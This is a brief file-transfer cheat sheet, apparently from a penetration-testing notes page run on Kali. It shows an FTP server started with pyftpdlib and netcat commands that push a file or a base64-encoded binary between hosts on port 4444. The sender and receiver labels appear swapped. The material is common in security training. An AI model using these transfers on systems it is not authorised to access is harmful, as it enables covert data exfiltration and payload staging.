File Transfers
apt-get install python-pyftpdlib
root@kali# python -m pyftpdlib -p 21// Receiver
nc 192.168.0.1 4444 < file
// Sender
cat file | nc -nlvp 4444 // Normal file
// Base64 encoded sender
cat binary | base64 | nc -nlvp 4444Last updated